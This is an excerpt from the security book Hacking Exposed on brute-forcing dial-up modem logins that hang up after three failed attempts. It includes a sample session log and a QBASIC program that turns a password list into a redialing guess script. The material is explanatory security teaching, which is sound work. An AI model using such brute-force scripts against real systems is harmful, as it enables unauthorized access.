Domain2

Brute Force Domain 2: Single Authentication, Limited Attempts 
(Excerpts from Hacking Exposed written by Stephan Barnes  "M4phr1k")

Our second domain takes the theoretical next amount of time to attempt to penetrate.  This is because an additional component to the script needs to be added.  Using our examples shown thus far let’s review a 2nddomain result in (FIG 4).  You will notice a slight difference here between our true 1st domain example.  In this example after three attempts the ATH0 appears.  This is the typical Hayes Modem character set for Hang Up.  What this means is that this particular connection hangs up after 3 attempts.  It could be 4, 5 or 6 or some other number, but the demonstrated purpose here is that you now how to dial back up the connection after X (3 in this example) amount of attempts.  The solution to this is to add some code to our existing example shown in (FIG 5).  Essentially this means doing the password guess 3 times and then redialing the connection and starting the process over.

(FIG 4)

XX-Jul-XX 03:45:08 91XXX5551235 C: CONNECT 9600/ARQ/V32/LAPM

Enter Password:
Invalid Password.

Enter Password:
Invalid Password.

Enter Password:
Invalid Password.
ATH0

(Note the important characteristic – the ATH0, which is the typical HAYES character set for hang-up)

(FIG 5)

Example QBASIC program (called 5551235.BAS)

OPEN "5551235.was" FOR OUTPUT AS #2
OPEN "LIST.txt" FOR INPUT AS #1
PRINT #2, "proc main"
DO UNTIL EOF(1)
PRINT #2, "dial DATA " + CHR$(34) + "5551235" + CHR$(34)
LINE INPUT #1, in$
in$ = LTRIM$(in$) + "^M"
PRINT #2, "waitfor " + CHR$(34) + "Enter Password:" + CHR$(34)
PRINT #2, "transmit " + CHR$(34) + in$ + CHR$(34)
LINE INPUT #1, in$
in$ = LTRIM$(in$) + "^M"
PRINT #2, "waitfor " + CHR$(34) + "Enter Password:" + CHR$(34)
PRINT #2, "transmit " + CHR$(34) + in$ + CHR$(34)
LINE INPUT #1, in$
in$ = LTRIM$(in$) + "^M"
PRINT #2, "waitfor " + CHR$(34) + "Enter Password:" + CHR$(34)
PRINT #2, "transmit " + CHR$(34) + in$ + CHR$(34)
LOOP
PRINT #2, "endproc"
Comments